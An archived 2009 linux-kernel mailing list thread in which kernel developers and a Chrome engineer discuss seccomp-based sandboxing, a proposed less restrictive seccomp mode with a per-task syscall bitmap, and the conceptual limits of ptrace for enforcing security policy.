  2009-02-28 17:46           ` [stable] " Greg KH
  2009-02-28 21:09           ` Benjamin Herrenschmidt
@ 2009-03-02  1:44           ` Roland McGrath
  2009-05-06 18:46           ` Markus Gutschke (顧孟勤)
  3 siblings, 0 replies; 31+ messages in thread
From: Roland McGrath @ 2009-03-02  1:44 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Andrew Morton, x86, linux-kernel, stable, linux-mips, sparclinux,
	linuxppc-dev

> And I guess the seccomp interaction means that this is potentially a 
> 2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It 
> does seem to be enabled in at least Fedora kernels, but it might not be 
> used anywhere.

I have no idea who uses it.  I just assume that anyone who is using it
might be expecting it to be reliable for security purposes as advertised.


Thanks,
Roland

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-02-28 17:23         ` Linus Torvalds
                             ` (2 preceding siblings ...)
  2009-03-02  1:44           ` Roland McGrath
@ 2009-05-06 18:46           ` Markus Gutschke (顧孟勤)
  2009-05-06 21:29             ` Ingo Molnar
  3 siblings, 1 reply; 31+ messages in thread
From: Markus Gutschke (顧孟勤) @ 2009-05-06 18:46 UTC (permalink / raw)
  To: Linus Torvalds
  Cc: Roland McGrath, Andrew Morton, x86, linux-kernel, stable,
	linux-mips, sparclinux, linuxppc-dev

On Sat, Feb 28, 2009 at 10:23, Linus Torvalds
<torvalds@linux-foundation.org> wrote:
> And I guess the seccomp interaction means that this is potentially a
> 2.6.29 thing. Not that I know whether anybody actually _uses_ seccomp. It
> does seem to be enabled in at least Fedora kernels, but it might not be
> used anywhere.

In the Linux version of Google Chrome, we are currently working on
code that will use seccomp for parts of our sandboxing solution.


Markus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 18:46           ` Markus Gutschke (顧孟勤)
@ 2009-05-06 21:29             ` Ingo Molnar
  2009-05-06 21:46               ` Markus Gutschke (顧孟勤)
  0 siblings, 1 reply; 31+ messages in thread
From: Ingo Molnar @ 2009-05-06 21:29 UTC (permalink / raw)
  To: Markus Gutschke (顧孟勤)
  Cc: Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev


* Markus Gutschke (顧孟勤) <markus@google.com> wrote:

> On Sat, Feb 28, 2009 at 10:23, Linus Torvalds
> <torvalds@linux-foundation.org> wrote:

> > And I guess the seccomp interaction means that this is 
> > potentially a 2.6.29 thing. Not that I know whether anybody 
> > actually _uses_ seccomp. It does seem to be enabled in at least 
> > Fedora kernels, but it might not be used anywhere.
> 
> In the Linux version of Google Chrome, we are currently working on 
> code that will use seccomp for parts of our sandboxing solution.

That's a pretty interesting usage. What would be fallback mode you 
are using if the kernel doesnt have seccomp built in? Completely 
non-sandboxed? Or a ptrace/PTRACE_SYSCALL based sandbox?

	Ingo

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 21:29             ` Ingo Molnar
@ 2009-05-06 21:46               ` Markus Gutschke (顧孟勤)
  2009-05-06 21:54                 ` Ingo Molnar
                                   ` (2 more replies)
  0 siblings, 3 replies; 31+ messages in thread
From: Markus Gutschke (顧孟勤) @ 2009-05-06 21:46 UTC (permalink / raw)
  To: Ingo Molnar
  Cc: Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev

On Wed, May 6, 2009 at 14:29, Ingo Molnar <mingo@elte.hu> wrote:
> That's a pretty interesting usage. What would be fallback mode you
> are using if the kernel doesnt have seccomp built in? Completely
> non-sandboxed? Or a ptrace/PTRACE_SYSCALL based sandbox?

Ptrace has performance and/or reliability problems when used to
sandbox threaded applications due to potential race conditions when
inspecting system call arguments. We hope that we can avoid this
problem with seccomp. It is very attractive that kernel automatically
terminates any application that violates the very well-defined
constraints of the sandbox.

In general, we are currently exploring different options based on
general availability, functionality, and complexity of implementation.
Seccomp is a good middle ground that we expect to be able to use in
the medium term to provide an acceptable solution for a large segment
of Linux users. Although the restriction to just four unfiltered
system calls is painful.

We are still discussing what fallback options we have, and they are
likely on different schedules.

For instance, on platforms that have AppArmor or SELinux, we might be
able to use them as part of our sandboxing solution. Although we are
still investigating whether they meet all of our needs.


Markus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 21:46               ` Markus Gutschke (顧孟勤)
@ 2009-05-06 21:54                 ` Ingo Molnar
  2009-05-06 22:08                   ` Markus Gutschke (顧孟勤)
  2009-05-07  7:31                 ` Roland McGrath
       [not found]                 ` <20090507070312.DCC5EFC39E@magilla.sf.frob.com>
  2 siblings, 1 reply; 31+ messages in thread
From: Ingo Molnar @ 2009-05-06 21:54 UTC (permalink / raw)
  To: Markus Gutschke (顧孟勤)
  Cc: Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev


* Markus Gutschke (顧孟勤) <markus@google.com> wrote:

> On Wed, May 6, 2009 at 14:29, Ingo Molnar <mingo@elte.hu> wrote:
> > That's a pretty interesting usage. What would be fallback mode you
> > are using if the kernel doesnt have seccomp built in? Completely
> > non-sandboxed? Or a ptrace/PTRACE_SYSCALL based sandbox?
> 
> Ptrace has performance and/or reliability problems when used to 
> sandbox threaded applications due to potential race conditions 
> when inspecting system call arguments. We hope that we can avoid 
> this problem with seccomp. It is very attractive that kernel 
> automatically terminates any application that violates the very 
> well-defined constraints of the sandbox.
> 
> In general, we are currently exploring different options based on 
> general availability, functionality, and complexity of 
> implementation. Seccomp is a good middle ground that we expect to 
> be able to use in the medium term to provide an acceptable 
> solution for a large segment of Linux users. Although the 
> restriction to just four unfiltered system calls is painful.

Which other system calls would you like to use? Futexes might be 
one, for fast synchronization primitives?

	Ingo

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 21:54                 ` Ingo Molnar
@ 2009-05-06 22:08                   ` Markus Gutschke (顧孟勤)
  2009-05-06 22:13                     ` Ingo Molnar
  2009-05-08 19:18                     ` Andi Kleen
  0 siblings, 2 replies; 31+ messages in thread
From: Markus Gutschke (顧孟勤) @ 2009-05-06 22:08 UTC (permalink / raw)
  To: Ingo Molnar
  Cc: Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev

On Wed, May 6, 2009 at 14:54, Ingo Molnar <mingo@elte.hu> wrote:
> Which other system calls would you like to use? Futexes might be
> one, for fast synchronization primitives?

There are a large number of system calls that "normal" C/C++ code uses
quite frequently, and that are not security sensitive. A typical
example would be gettimeofday(). But there are other system calls,
where the sandbox would not really need to inspect arguments as the
call does not expose any exploitable interface.

It is currently awkward that in order to use seccomp we have to
intercept all system calls and provide alternative implementations for
them; whereas we really only care about a comparatively small number
of security critical operations that we need to restrict.

Also, any redirected system call ends up incurring at least two
context switches, which is needlessly expensive for the large number
of trivial system calls. We are quite happy that read() and write(),
which are quite important to us, do not incur this penalty.


Markus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 22:08                   ` Markus Gutschke (顧孟勤)
@ 2009-05-06 22:13                     ` Ingo Molnar
  2009-05-06 22:21                       ` Markus Gutschke (顧孟勤)
  2009-05-08 19:18                     ` Andi Kleen
  1 sibling, 1 reply; 31+ messages in thread
From: Ingo Molnar @ 2009-05-06 22:13 UTC (permalink / raw)
  To: Markus Gutschke (顧孟勤)
  Cc: Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev


* Markus Gutschke (顧孟勤) <markus@google.com> wrote:

> On Wed, May 6, 2009 at 14:54, Ingo Molnar <mingo@elte.hu> wrote:
> > Which other system calls would you like to use? Futexes might be
> > one, for fast synchronization primitives?
> 
> There are a large number of system calls that "normal" C/C++ code 
> uses quite frequently, and that are not security sensitive. A 
> typical example would be gettimeofday(). But there are other 
> system calls, where the sandbox would not really need to inspect 
> arguments as the call does not expose any exploitable interface.
> 
> It is currently awkward that in order to use seccomp we have to 
> intercept all system calls and provide alternative implementations 
> for them; whereas we really only care about a comparatively small 
> number of security critical operations that we need to restrict.
> 
> Also, any redirected system call ends up incurring at least two 
> context switches, which is needlessly expensive for the large 
> number of trivial system calls. We are quite happy that read() and 
> write(), which are quite important to us, do not incur this 
> penalty.

doing a (per arch) bitmap of harmless syscalls and replacing the 
mode1_syscalls[] check with that in kernel/seccomp.c would be a 
pretty reasonable extension. (.config controllable perhaps, for 
old-style-seccomp)

It would probably be faster than the current loop over 
mode1_syscalls[] as well.

	Ingo

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 22:13                     ` Ingo Molnar
@ 2009-05-06 22:21                       ` Markus Gutschke (顧孟勤)
  2009-05-07  4:23                         ` Nicholas Miell
  0 siblings, 1 reply; 31+ messages in thread
From: Markus Gutschke (顧孟勤) @ 2009-05-06 22:21 UTC (permalink / raw)
  To: Ingo Molnar
  Cc: Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev

On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> doing a (per arch) bitmap of harmless syscalls and replacing the
> mode1_syscalls[] check with that in kernel/seccomp.c would be a
> pretty reasonable extension. (.config controllable perhaps, for
> old-style-seccomp)
>
> It would probably be faster than the current loop over
> mode1_syscalls[] as well.

This would be a great option to improve performance of our sandbox. I
can detect the availability of the new kernel API dynamically, and
then not intercept the bulk of the system calls. This would allow the
sandbox to work both with existing and with newer kernels.

We'll post a kernel patch for discussion in the next few days,


Markus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 22:21                       ` Markus Gutschke (顧孟勤)
@ 2009-05-07  4:23                         ` Nicholas Miell
  2009-05-07 10:11                           ` Ingo Molnar
  0 siblings, 1 reply; 31+ messages in thread
From: Nicholas Miell @ 2009-05-07  4:23 UTC (permalink / raw)
  To: Markus Gutschke (顧孟勤)
  Cc: Ingo Molnar, Linus Torvalds, Roland McGrath, Andrew Morton, x86,
	linux-kernel, stable, linux-mips, sparclinux, linuxppc-dev

On Wed, 2009-05-06 at 15:21 -0700, Markus Gutschke (顧孟勤) wrote:
> On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> > doing a (per arch) bitmap of harmless syscalls and replacing the
> > mode1_syscalls[] check with that in kernel/seccomp.c would be a
> > pretty reasonable extension. (.config controllable perhaps, for
> > old-style-seccomp)
> >
> > It would probably be faster than the current loop over
> > mode1_syscalls[] as well.
> 
> This would be a great option to improve performance of our sandbox. I
> can detect the availability of the new kernel API dynamically, and
> then not intercept the bulk of the system calls. This would allow the
> sandbox to work both with existing and with newer kernels.
> 
> We'll post a kernel patch for discussion in the next few days,
> 

I suspect the correct thing to do would be to leave seccomp mode 1 alone
and introduce a mode 2 with a less restricted set of system calls -- the
interface was designed to be extended in this way, after all.

-- 
Nicholas Miell <nmiell@comcast.net>


^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 21:46               ` Markus Gutschke (顧孟勤)
  2009-05-06 21:54                 ` Ingo Molnar
@ 2009-05-07  7:31                 ` Roland McGrath
  2009-05-08  1:59                   ` David Wagner
       [not found]                 ` <20090507070312.DCC5EFC39E@magilla.sf.frob.com>
  2 siblings, 1 reply; 31+ messages in thread
From: Roland McGrath @ 2009-05-07  7:31 UTC (permalink / raw)
  To: markus
  Cc: Ingo Molnar, Linus Torvalds, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev

> Ptrace has performance and/or reliability problems when used to
> sandbox threaded applications due to potential race conditions when
> inspecting system call arguments. We hope that we can avoid this
> problem with seccomp.

ptrace certainly has performance issues.  I take it the only "reliability
problems" you are talking about are MT races with modifications to user
memory that is relevant to a system call.  (Is there something else?)
That is not a "ptrace problem" per se at all.  It's an intrinsic problem
with any method based on "generic" syscall interception, if the filtering
and enforcement decisions depend on examining user memory.  By the same
token, no such method has a "reliability problem" if the filtering checks
only examine the registers (or other thread-synchronous state).

In the sense that I mean, seccomp is "generic syscall interception" too.
(That is, the checks/enforcement are "around" the call, rather than inside
it with direct atomicity controls binding the checks and uses together.)
The only reason seccomp does not have this "reliability problem" is that
its filtering is trivial and depends only on registers (in fact, only on
one register, the syscall number).

If you want to do checks that depend on shared or volatile state, then
syscall interception is really not the proper mechanism for you.  (Likely
examples include user memory, e.g. for file names in open calls, or ioctl
struct contents, etc., fd tables or filesystem details, etc.)  For that
you need mechanisms that look at stable kernel copies of user data that
are what the syscall will actually use, such as is done by audit, LSM, etc.

If you only have checks confined to thread-synchronous state such as the
user registers, then you don't have any "reliability problem" regardless
of the the particular syscall interception mechanism you use.  (ptrace has
many problems for this or any other purpose, but this is not one of them.)
That's unless you are referring to some other "reliability problem" that
I'm not aware of.  (And I'll leave aside the "is it registers or is it
user memory?" issue on ia64 as irrelevant, since, you know, it's ia64.)

If syscall interception is indeed an appropriate mechanism for your needs
and you want something tailored more specifically to your exact use in
future kernels, a module doing this would be easy to implement using the
utrace API.  (That might be a "compelling use" of utrace by virtue of the
Midas brand name effect, if nothing else. ;-)


Thanks,
Roland

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
       [not found]                 ` <20090507070312.DCC5EFC39E@magilla.sf.frob.com>
@ 2009-05-07  8:01                   ` Markus Gutschke (顧孟勤)
  0 siblings, 0 replies; 31+ messages in thread
From: Markus Gutschke (顧孟勤) @ 2009-05-07  8:01 UTC (permalink / raw)
  To: Roland McGrath
  Cc: Ingo Molnar, Linus Torvalds, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev

On Thu, May 7, 2009 at 00:03, Roland McGrath <roland@redhat.com> wrote:
>
> That is not a "ptrace problem" per se at all.  It's an intrinsic problem
> with any method based on "generic" syscall interception, if the filtering
> and enforcement decisions depend on examining user memory.

Yes, this is indeed the main problem that we are aware of. It can be
avoided by suspending all threads during user memory inspection, but
that's a horrible price to pay (also: see below for an alternative
approach, that could in principle be adapted to use with ptrace)

> The only reason seccomp does not have this "reliability problem" is that
> its filtering is trivial and depends only on registers (in fact, only on
> one register, the syscall number).

Simplicity is really the beauty of seccomp. It is very easy to verify
that it does the right thing from a security point of view, because
any attempt to call unsafe system calls results in the kernel
terminating the program. This is much preferable over most ptrace
solutions which is more difficult to audit for correctness.

The downside is that the sandbox'd code needs to delegate execution of
most of its system calls to a monitor process. This is slow and rather
awkward. Although due to the magic of clone(), (almost) all system
calls can in fact be serialized, sent to the monitor process, have
their arguments safely inspected, and then executed on behalf of the
sandbox'd process. Details are tedious but we believe they are
solvable with current kernel APIs.

The other issue is performance. For system calls that are known to be
safe, we would rather not pay the penalty of redirecting them. A
kernel patch that made seccomp more efficient for these system calls
would be very welcome, and we will post such a patch for discussion
shortly.

> If you want to do checks that depend on shared or volatile state, then
> syscall interception is really not the proper mechanism for you.

We agree that syscall interception is a poor abstraction level for a
sandbox. But in the short term, we need to work with the APIs that are
available in today's kernels. And we believe that seccomp is one of
the more promising API that are currently available to us.


Markus

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-07  4:23                         ` Nicholas Miell
@ 2009-05-07 10:11                           ` Ingo Molnar
  2009-05-10  5:37                             ` Pavel Machek
  0 siblings, 1 reply; 31+ messages in thread
From: Ingo Molnar @ 2009-05-07 10:11 UTC (permalink / raw)
  To: Nicholas Miell
  Cc: Markus Gutschke (顧孟勤),
	Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev


* Nicholas Miell <nmiell@comcast.net> wrote:

> On Wed, 2009-05-06 at 15:21 -0700, Markus Gutschke (顧孟勤) wrote:
> > On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> > > doing a (per arch) bitmap of harmless syscalls and replacing the
> > > mode1_syscalls[] check with that in kernel/seccomp.c would be a
> > > pretty reasonable extension. (.config controllable perhaps, for
> > > old-style-seccomp)
> > >
> > > It would probably be faster than the current loop over
> > > mode1_syscalls[] as well.
> > 
> > This would be a great option to improve performance of our sandbox. I
> > can detect the availability of the new kernel API dynamically, and
> > then not intercept the bulk of the system calls. This would allow the
> > sandbox to work both with existing and with newer kernels.
> > 
> > We'll post a kernel patch for discussion in the next few days,
> > 
> 
> I suspect the correct thing to do would be to leave seccomp mode 1 
> alone and introduce a mode 2 with a less restricted set of system 
> calls -- the interface was designed to be extended in this way, 
> after all.

Yes, that is what i alluded to above via the '.config controllable' 
aspect.

Mode 2 could be implemented like this: extend prctl_set_seccomp() 
with a bitmap pointer, and copy it to a per task seccomp context 
structure.

a bitmap for 300 syscalls takes only about 40 bytes.

Please take care to implement nesting properly: if a seccomp context 
does a seccomp call (which mode 2 could allow), then the resulting 
bitmap should be the logical-AND of the parent and child bitmaps. 
There's no reason why seccomp couldnt be used in hiearachy of 
sandboxes, in a gradually less permissive fashion.

	Ingo

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-07  7:31                 ` Roland McGrath
@ 2009-05-08  1:59                   ` David Wagner
  2009-05-10  5:36                     ` Pavel Machek
  0 siblings, 1 reply; 31+ messages in thread
From: David Wagner @ 2009-05-08  1:59 UTC (permalink / raw)
  To: linux-kernel

Roland McGrath  wrote:
>> Ptrace has performance and/or reliability problems when used to
>> sandbox threaded applications due to potential race conditions when
>> inspecting system call arguments. We hope that we can avoid this
>> problem with seccomp.
>
>ptrace certainly has performance issues.  I take it the only "reliability
>problems" you are talking about are MT races with modifications to user
>memory that is relevant to a system call.  (Is there something else?)

As of 1999, I believe there were some other issues for using ptrace
securely:

1. I do not know of a good way to reliably ensure that all children of
a traced program will be traced as well.  If you wait for the fork()
call to return, check the pid, and start tracing the child process,
you are subject to race conditions.  (strace's solution is to modify
the code of the traced program to put a trapping instruction immediately
after the call site to fork().  This is a grody hack and I had a hard
time convincing myself that this will be secure in all cases.)

2. ptrace disrupts the process hierarchy and Unix signals.  Because of
the way ptrace overloads signals to deliver tracing events, tracing is
not transparent.  For instance, if the parent and child are both traced,
and the parent waits for a signal from the child, things may no longer
work the same way while being traced.  Working around this requires
non-trivial code.  Complexity is the enemy of security and makes it hard
to gain confidence this doesn't introduce subtle issues.

3. If the tracing application should happen to die unexpectedly
(OOM, anyone?), I believe the traced application continues running,
now without any security checks.

4. I seem to recall that when I looked at this in 1999, if the traced
app makes a syscall that should not be allowed, I couldn't find a good
way to prevent that syscall from executing.  I don't know if current
ptrace has solved this problem.

Disclaimer: I haven't checked whether these all still apply today.

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-06 22:08                   ` Markus Gutschke (顧孟勤)
  2009-05-06 22:13                     ` Ingo Molnar
@ 2009-05-08 19:18                     ` Andi Kleen
  1 sibling, 0 replies; 31+ messages in thread
From: Andi Kleen @ 2009-05-08 19:18 UTC (permalink / raw)
  To: Markus Gutschke (ÜÒÐ)
  Cc: Ingo Molnar, Linus Torvalds, Roland McGrath, Andrew Morton, x86,
	linux-kernel, stable, linux-mips, sparclinux, linuxppc-dev

"Markus Gutschke (ÜÒÐ)" <markus@google.com> writes:
>
> There are a large number of system calls that "normal" C/C++ code uses
> quite frequently, and that are not security sensitive. A typical
> example would be gettimeofday().

At least on x86-64 gettimeofday() (and time(2)) work inside seccomp because 
they're vsyscalls that run in ring 3 only.

-Andi

-- 
ak@linux.intel.com -- Speaking for myself only.

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-08  1:59                   ` David Wagner
@ 2009-05-10  5:36                     ` Pavel Machek
  0 siblings, 0 replies; 31+ messages in thread
From: Pavel Machek @ 2009-05-10  5:36 UTC (permalink / raw)
  To: David Wagner; +Cc: linux-kernel

Hi!

> >> Ptrace has performance and/or reliability problems when used to
> >> sandbox threaded applications due to potential race conditions when
> >> inspecting system call arguments. We hope that we can avoid this
> >> problem with seccomp.
> >
> >ptrace certainly has performance issues.  I take it the only "reliability
> >problems" you are talking about are MT races with modifications to user
> >memory that is relevant to a system call.  (Is there something else?)
> 
> As of 1999, I believe there were some other issues for using ptrace
> securely:
> 
> 1. I do not know of a good way to reliably ensure that all children of
> a traced program will be traced as well.  If you wait for the fork()
> call to return, check the pid, and start tracing the child process,
> you are subject to race conditions.  (strace's solution is to modify
> the code of the traced program to put a trapping instruction immediately
> after the call site to fork().  This is a grody hack and I had a hard
> time convincing myself that this will be secure in all cases.)
> 
> 2. ptrace disrupts the process hierarchy and Unix signals.  Because of
> the way ptrace overloads signals to deliver tracing events, tracing is
> not transparent.  For instance, if the parent and child are both traced,
> and the parent waits for a signal from the child, things may no longer
> work the same way while being traced.  Working around this requires
> non-trivial code.  Complexity is the enemy of security and makes it hard
> to gain confidence this doesn't introduce subtle issues.
> 
> 3. If the tracing application should happen to die unexpectedly
> (OOM, anyone?), I believe the traced application continues running,
> now without any security checks.
> 
> 4. I seem to recall that when I looked at this in 1999, if the traced
> app makes a syscall that should not be allowed, I couldn't find a good
> way to prevent that syscall from executing.  I don't know if current
> ptrace has solved this problem.
> 
> Disclaimer: I haven't checked whether these all still apply today.

subterfugue.net has ptrace-based monitor that is secure AFAICT. We
improved ptrace for it a bit...
								Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html

^ permalink raw reply	[flat|nested] 31+ messages in thread

* Re: [PATCH 2/2] x86-64: seccomp: fix 32/64 syscall hole
  2009-05-07 10:11                           ` Ingo Molnar
@ 2009-05-10  5:37                             ` Pavel Machek
  0 siblings, 0 replies; 31+ messages in thread
From: Pavel Machek @ 2009-05-10  5:37 UTC (permalink / raw)
  To: Ingo Molnar
  Cc: Nicholas Miell, Markus Gutschke (?????????),
	Linus Torvalds, Roland McGrath, Andrew Morton, x86, linux-kernel,
	stable, linux-mips, sparclinux, linuxppc-dev

On Thu 2009-05-07 12:11:29, Ingo Molnar wrote:
> 
> * Nicholas Miell <nmiell@comcast.net> wrote:
> 
> > On Wed, 2009-05-06 at 15:21 -0700, Markus Gutschke (?????????) wrote:
> > > On Wed, May 6, 2009 at 15:13, Ingo Molnar <mingo@elte.hu> wrote:
> > > > doing a (per arch) bitmap of harmless syscalls and replacing the
> > > > mode1_syscalls[] check with that in kernel/seccomp.c would be a
> > > > pretty reasonable extension. (.config controllable perhaps, for
> > > > old-style-seccomp)
> > > >
> > > > It would probably be faster than the current loop over
> > > > mode1_syscalls[] as well.
> > > 
> > > This would be a great option to improve performance of our sandbox. I
> > > can detect the availability of the new kernel API dynamically, and
> > > then not intercept the bulk of the system calls. This would allow the
> > > sandbox to work both with existing and with newer kernels.
> > > 
> > > We'll post a kernel patch for discussion in the next few days,
> > > 
> > 
> > I suspect the correct thing to do would be to leave seccomp mode 1 
> > alone and introduce a mode 2 with a less restricted set of system 
> > calls -- the interface was designed to be extended in this way, 
> > after all.
> 
> Yes, that is what i alluded to above via the '.config controllable' 
> aspect.
> 
> Mode 2 could be implemented like this: extend prctl_set_seccomp() 
> with a bitmap pointer, and copy it to a per task seccomp context 
> structure.
> 
> a bitmap for 300 syscalls takes only about 40 bytes.
> 
> Please take care to implement nesting properly: if a seccomp context 
> does a seccomp call (which mode 2 could allow), then the resulting 
> bitmap should be the logical-AND of the parent and child bitmaps. 
> There's no reason why seccomp couldnt be used in hiearachy of 
> sandboxes, in a gradually less permissive fashion.

I don't think seccomp nesting (at kernel level) has any value.

First, syscalls are wrong level of abstraction for sandboxing. There
are multiple ways to read from file, for example.

If you wanted to do hierarchical sandboxes, asking your monitor to
restrict your seccomp mask would seem like a way to go...
								Pavel
-- 
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html

^ permalink raw reply	[flat|nested] 31+ messages in thread

end of thread, other threads:[~2009-05-11 12:15 UTC | newest]

Thread overview: 31+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
2009-02-28  3:02 [PATCH 0/2] x86-64: 32/64 syscall arch holes Roland McGrath
2009-02-28  3:03 ` [PATCH 1/2] x86-64: syscall-audit: fix 32/64 syscall hole Roland McGrath
2009-02-28  3:04 ` [PATCH 2/2] x86-64: seccomp: " Roland McGrath
2009-02-28  3:36   ` Linus Torvalds
2009-02-28  3:52     ` Linus Torvalds
2009-02-28  4:46       ` Ingo Molnar
2009-02-28  7:25       ` Roland McGrath
2009-02-28  7:31         ` Ingo Molnar
2009-02-28  7:36           ` Roland McGrath
2009-02-28 17:23         ` Linus Torvalds
2009-02-28 17:46           ` [stable] " Greg KH
2009-02-28 17:54             ` Arjan van de Ven
2009-02-28 18:23               ` Greg KH
2009-02-28 20:27                 ` Greg KH
2009-02-28 21:09           ` Benjamin Herrenschmidt
2009-03-02  1:44           ` Roland McGrath
2009-05-06 18:46           ` Markus Gutschke (顧孟勤)
2009-05-06 21:29             ` Ingo Molnar
2009-05-06 21:46               ` Markus Gutschke (顧孟勤)
2009-05-06 21:54                 ` Ingo Molnar
2009-05-06 22:08                   ` Markus Gutschke (顧孟勤)
2009-05-06 22:13                     ` Ingo Molnar
2009-05-06 22:21                       ` Markus Gutschke (顧孟勤)
2009-05-07  4:23                         ` Nicholas Miell
2009-05-07 10:11                           ` Ingo Molnar
2009-05-10  5:37                             ` Pavel Machek
2009-05-08 19:18                     ` Andi Kleen
2009-05-07  7:31                 ` Roland McGrath
2009-05-08  1:59                   ` David Wagner
2009-05-10  5:36                     ` Pavel Machek
     [not found]                 ` <20090507070312.DCC5EFC39E@magilla.sf.frob.com>
2009-05-07  8:01                   ` Markus Gutschke (顧孟勤)

This is a public inbox, see mirroring instructions
for how to clone and mirror all data and code used for this inbox;
as well as URLs for NNTP newsgroup(s).